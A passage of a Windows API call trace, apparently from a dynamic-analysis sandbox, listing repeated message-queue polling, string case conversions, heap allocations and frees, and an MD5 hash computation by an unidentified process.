wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.476] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.477] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.477] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.477] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.477] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.477] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.477] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.477] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.477] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.477] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.480] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.481] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.481] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.481] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.481] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.481] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.482] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.483] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0268.483] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.484] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.485] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0268.485] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0268.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0268.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.486] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0268.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.487] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.487] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0268.487] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.487] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.487] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0268.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.488] CryptHashData (hHash=0xaa5760, pbData=0x24b2db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0268.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0268.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0268.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0268.493] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.493] RtlAllocateHeap 